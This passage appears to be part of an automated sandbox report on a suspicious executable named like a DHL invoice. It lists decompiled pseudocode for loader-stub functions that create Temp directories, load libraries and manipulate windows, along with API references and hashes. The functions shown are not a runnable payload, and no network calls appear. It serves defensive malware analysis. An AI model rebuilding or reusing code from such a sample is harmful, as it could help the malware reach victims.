                                        					_t10 = E0040136D(_t8);
                                        					if(_t10 != 0) {
                                        						_t11 = _t10 - 1;
                                        						_t16 = _t17;
                                        						_t17 = _t11;
                                        						_t12 = _t11 - _t16;
                                        					} else {
                                        						_t12 = _t10 + 1;
                                        						_t17 = _t17 + 1;
                                        					}
                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                        						 *0x422eec =  *0x422eec + _t12;
                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422eec, 0x7530,  *0x422ed4), 0); // executed
                                        					}
                                        				}
                                        				return 0;
                                        			}











                                        0x0040138a
                                        0x004013fa
                                        0x0040139b
                                        0x004013a0
                                        0x00000000
                                        0x00000000
                                        0x004013a2
                                        0x004013a3
                                        0x004013ad
                                        0x00000000
                                        0x00401404
                                        0x004013b0
                                        0x004013b7
                                        0x004013bd
                                        0x004013be
                                        0x004013c0
                                        0x004013c2
                                        0x004013b9
                                        0x004013b9
                                        0x004013ba
                                        0x004013ba
                                        0x004013c9
                                        0x004013cb
                                        0x004013f4
                                        0x004013f4
                                        0x004013c9
                                        0x00000000

                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32 ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                        • Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
                                        • Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                        • Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401A1E(char __ebx) {
                                        				CHAR* _t7;
                                        				long _t8;
                                        				char _t12;
                                        				CHAR* _t17;
                                        				void* _t19;
                                        
                                        				_t12 = __ebx;
                                        				_t7 = E00402B2C(1);
                                        				 *(_t19 + 8) = _t7;
                                        				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x400); // executed
                                        				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x2c)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                        					 *_t17 = _t12;
                                        				}
                                        				_t17[0x3ff] = _t12;
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}








                                        0x00401a1e
                                        0x00401a22
                                        0x00401a2e
                                        0x00401a31
                                        0x00401a39
                                        0x00401a4e
                                        0x00401a51
                                        0x00401a51
                                        0x00401a53
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStringslstrcmp
                                        • String ID:
                                        • API String ID: 1938659011-0
                                        • Opcode ID: 7b54e289e4817a3f322a7e849ea66bab3a10ae1c18b877263ce7955cfc432a77
                                        • Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
                                        • Opcode Fuzzy Hash: 7b54e289e4817a3f322a7e849ea66bab3a10ae1c18b877263ce7955cfc432a77
                                        • Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: a913115b0b618877984699264344b8a1880e6ceeac658a5775d41212f4eb71b2
                                        • Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
                                        • Opcode Fuzzy Hash: a913115b0b618877984699264344b8a1880e6ceeac658a5775d41212f4eb71b2
                                        • Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040156F(void* __ebx, int __edx) {
                                        				int _t3;
                                        				void* _t8;
                                        				struct HWND__* _t10;
                                        				struct HWND__* _t11;
                                        				void* _t16;
                                        
                                        				_t8 = __ebx;
                                        				_t10 =  *0x422ed0; // 0x103fe
                                        				if(_t10 != __ebx) {
                                        					ShowWindow(_t10, __edx); // executed
                                        					_t3 =  *(_t16 - 0x34);
                                        				}
                                        				_t11 =  *0x422ee4; // 0x103f8
                                        				if(_t11 != _t8) {
                                        					ShowWindow(_t11, _t3); // executed
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t16 - 4));
                                        				return 0;
                                        			}








                                        0x0040156f
                                        0x0040156f
                                        0x0040157d
                                        0x00401581
                                        0x00401583
                                        0x00401583
                                        0x00401586
                                        0x0040158e
                                        0x00401596
                                        0x00401596
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • ShowWindow.USER32(000103FE), ref: 00401581
                                        • ShowWindow.USER32(000103F8), ref: 00401596
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 01b8f08c91b687540e8bb59e961ce2b0c28ac7e6e5880a628e7803932cc216c7
                                        • Instruction ID: 9b4c08dd34b2d0c6cc2545b51cfcf00afa42d444c9e8f3eecf44a84becef43f7
                                        • Opcode Fuzzy Hash: 01b8f08c91b687540e8bb59e961ce2b0c28ac7e6e5880a628e7803932cc216c7
                                        • Instruction Fuzzy Hash: 7BE086B6B10100BBCB24CF54EE8087E73AAEB84310750053FE502F3290C2B49D418B58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00406372(signed int _a4) {
                                        				struct HINSTANCE__* _t5;
                                        				signed int _t10;
                                        
                                        				_t10 = _a4 << 3;
                                        				_t8 =  *(_t10 + 0x409240);
                                        				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
                                        				if(_t5 != 0) {
                                        					L2:
                                        					return GetProcAddress(_t5,  *(_t10 + 0x409244));
                                        				}
                                        				_t5 = E00406304(_t8); // executed
                                        				if(_t5 == 0) {
                                        					return 0;
                                        				}
                                        				goto L2;
                                        			}





                                        0x0040637a
                                        0x0040637d
                                        0x00406384
                                        0x0040638c
                                        0x00406398
                                        0x00000000
                                        0x0040639f
                                        0x0040638f
                                        0x00406396
                                        0x00000000
                                        0x004063a7
                                        0x00000000

                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                          • Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32 ref: 0040631B
                                          • Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
                                          • Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                        • Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
                                        • Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                        • Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00405B73(CHAR* _a4, long _a8, long _a12) {
                                        				signed int _t5;
                                        				void* _t6;
                                        
                                        				_t5 = GetFileAttributesA(_a4); // executed
                                        				asm("sbb ecx, ecx");
                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                        				return _t6;
                                        			}





                                        0x00405b77
                                        0x00405b84
                                        0x00405b99
                                        0x00405b9f

                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 00405B77
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                        • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                        • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                        • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405B4E(CHAR* _a4) {
                                        				signed char _t3;
                                        				signed char _t7;
                                        
                                        				_t3 = GetFileAttributesA(_a4); // executed
                                        				_t7 = _t3;
                                        				if(_t7 != 0xffffffff) {
                                        					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                        				}
                                        				return _t7;
                                        			}





                                        0x00405b53
                                        0x00405b59
                                        0x00405b5e
                                        0x00405b67
                                        0x00405b67
                                        0x00405b70

                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,00405766,?,?,00000000,00405949,?,?,?,?), ref: 00405B53
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 724933c4db900905a8c2715ee946fd38794509a16b0cd5d1c9e98f984372ebec
                                        • Instruction ID: bc9e1bfcb83978c8760ec7414183e34ad4d98f7a4e3f8d166b670055928ff6f8
                                        • Opcode Fuzzy Hash: 724933c4db900905a8c2715ee946fd38794509a16b0cd5d1c9e98f984372ebec
                                        • Instruction Fuzzy Hash: BCD01272908025AFC2102728EE0C89BBFA5DB543B17058B71FD65A22F0D7305C529AAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405644(CHAR* _a4) {
                                        				int _t2;
                                        
                                        				_t2 = CreateDirectoryA(_a4, 0); // executed
                                        				if(_t2 == 0) {
                                        					return GetLastError();
                                        				}
                                        				return 0;
                                        			}




                                        0x0040564a
                                        0x00405652
                                        0x00000000
                                        0x00405658
                                        0x00000000

                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040564A
                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405658
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                        • Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
                                        • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                        • Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E73EF2A38(void* __ecx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				void* _t28;
                                        				void* _t29;
                                        				void* _t33;
                                        				void* _t37;
                                        				void* _t40;
                                        				void* _t45;
                                        				void* _t49;
                                        				signed int _t56;
                                        				void* _t61;
                                        				void* _t70;
                                        				intOrPtr _t72;
                                        				signed int _t77;
                                        				intOrPtr _t79;
                                        				intOrPtr _t80;
                                        				void* _t81;
                                        				void* _t87;
                                        				void* _t88;
                                        				void* _t89;
                                        				void* _t90;
                                        				intOrPtr _t93;
                                        				intOrPtr _t94;
                                        
                                        				if( *0x73ef4040 != 0 && E73EF297D(_a4) == 0) {
                                        					 *0x73ef4044 = _t93;
                                        					if( *0x73ef403c != 0) {
                                        						_t93 =  *0x73ef403c;
                                        					} else {
                                        						E73EF2F60(E73EF2977(), __ecx);
                                        						 *0x73ef403c = _t93;
                                        					}
                                        				}
                                        				_t28 = E73EF29AB(_a4);
                                        				_t94 = _t93 + 4;
                                        				if(_t28 <= 0) {
                                        					L9:
                                        					_t29 = E73EF299F();
                                        					_t72 = _a4;
                                        					_t79 =  *0x73ef4048;
                                        					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                        					 *0x73ef4048 = _t72;
                                        					E73EF2999();
                                        					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                        					 *0x73ef401c = _t33;
                                        					 *0x73ef4020 = _t79;
                                        					if( *0x73ef4040 != 0 && E73EF297D( *0x73ef4048) == 0) {
                                        						 *0x73ef403c = _t94;
                                        						_t94 =  *0x73ef4044;
                                        					}
                                        					_t80 =  *0x73ef4048;
                                        					_a4 = _t80;
                                        					 *0x73ef4048 =  *((intOrPtr*)(E73EF299F() + _t80));
                                        					_t37 = E73EF298B(_t80);
                                        					_pop(_t81);
                                        					if(_t37 != 0) {
                                        						_t40 = E73EF29AB(_t81);
                                        						if(_t40 > 0) {
                                        							_push(_t40);
                                        							_push(E73EF29B6() + _a4 + _v8);
                                        							_push(E73EF29C0());
                                        							if( *0x73ef4040 <= 0 || E73EF297D(_a4) != 0) {
                                        								_pop(_t88);
                                        								_pop(_t45);
                                        								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                        								if(__eflags == 0) {
                                        								}
                                        								asm("loop 0xfffffff5");
                                        							} else {
                                        								_pop(_t89);
                                        								_pop(_t49);
                                        								 *0x73ef403c =  *0x73ef403c +  *(_t89 + _t49) * 4;
                                        								asm("loop 0xffffffeb");
                                        							}
                                        						}
                                        					}
                                        					_t107 =  *0x73ef4048;
                                        					if( *0x73ef4048 == 0) {
                                        						 *0x73ef403c = 0;
                                        					}
                                        					E73EF29E4(_t107, _a4,  *0x73ef401c,  *0x73ef4020);
                                        					return _a4;
                                        				}
                                        				_push(E73EF29B6() + _a4);
                                        				_t56 = E73EF29BC();
                                        				_v8 = _t56;
                                        				_t77 = _t28;
                                        				_push(_t68 + _t56 * _t77);
                                        				_t70 = E73EF29C8();
                                        				_t87 = E73EF29C4();
                                        				_t90 = E73EF29C0();
                                        				_t61 = _t77;
                                        				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                        					_push( *((intOrPtr*)(_t70 + _t61)));
                                        				}
                                        				_push( *((intOrPtr*)(_t87 + _t61)));
                                        				asm("loop 0xfffffff1");
                                        				goto L9;
                                        			}

























                                        0x73ef2a48
                                        0x73ef2a59
                                        0x73ef2a66
                                        0x73ef2a7a
                                        0x73ef2a68
                                        0x73ef2a6d
                                        0x73ef2a72
                                        0x73ef2a72
                                        0x73ef2a66
                                        0x73ef2a83
                                        0x73ef2a88
                                        0x73ef2a8e
                                        0x73ef2ad2
                                        0x73ef2ad2
                                        0x73ef2ad7
                                        0x73ef2adc
                                        0x73ef2ae2
                                        0x73ef2ae4
                                        0x73ef2aea
                                        0x73ef2af7
                                        0x73ef2af9
                                        0x73ef2afe
                                        0x73ef2b0b
                                        0x73ef2b1e
                                        0x73ef2b24
                                        0x73ef2b2a
                                        0x73ef2b2b
                                        0x73ef2b31
                                        0x73ef2b3d
                                        0x73ef2b43
                                        0x73ef2b4b
                                        0x73ef2b4c
                                        0x73ef2b4f
                                        0x73ef2b5a
                                        0x73ef2b5c
                                        0x73ef2b68
                                        0x73ef2b6e
                                        0x73ef2b76
                                        0x73ef2ba2
                                        0x73ef2ba3
                                        0x73ef2ba5
                                        0x73ef2ba9
                                        0x73ef2ba9
                                        0x73ef2bb0
                                        0x73ef2b86
                                        0x73ef2b86
                                        0x73ef2b87
                                        0x73ef2b95
                                        0x73ef2b9e
                                        0x73ef2b9e
                                        0x73ef2b76
                                        0x73ef2b5a
                                        0x73ef2bb2
                                        0x73ef2bb9
                                        0x73ef2bbb
                                        0x73ef2bbb
                                        0x73ef2bd4
                                        0x73ef2be2
                                        0x73ef2be2
                                        0x73ef2a99
                                        0x73ef2a9a
                                        0x73ef2a9f
                                        0x73ef2aa3
                                        0x73ef2aa8
                                        0x73ef2abc
                                        0x73ef2abd
                                        0x73ef2abe
                                        0x73ef2ac0
                                        0x73ef2ac5
                                        0x73ef2ac7
                                        0x73ef2ac7
                                        0x73ef2aca
                                        0x73ef2ad0
                                        0x00000000

                                        APIs
                                        • CreateFileA.KERNELBASE(00000000), ref: 73EF2AF7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 4afdb7426a59b9350f7f87fffa98995a29e61d17d3d09fa5355c53b43106bcb5
                                        • Instruction ID: c59325b10095e1f0670510d204fc31bce67b02a6ef0b57f75827ebe22b40fb86
                                        • Opcode Fuzzy Hash: 4afdb7426a59b9350f7f87fffa98995a29e61d17d3d09fa5355c53b43106bcb5
                                        • Instruction Fuzzy Hash: 80415D7F50532FEFEBA1AFA5D880F593779EB84314F248525E809C7290D7B499808F62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402631(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                        				intOrPtr _t27;
                                        				intOrPtr _t33;
                                        				void* _t38;
                                        				void* _t41;
                                        
                                        				_t33 = __edx;
                                        				 *((intOrPtr*)(_t38 - 8)) = __ebx;
                                        				_t27 = E00402B0A(2);
                                        				_t41 = _t27 - 1;
                                        				 *((intOrPtr*)(_t38 - 0x10)) = _t33;
                                        				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
                                        				if(_t41 < 0) {
                                        					L24:
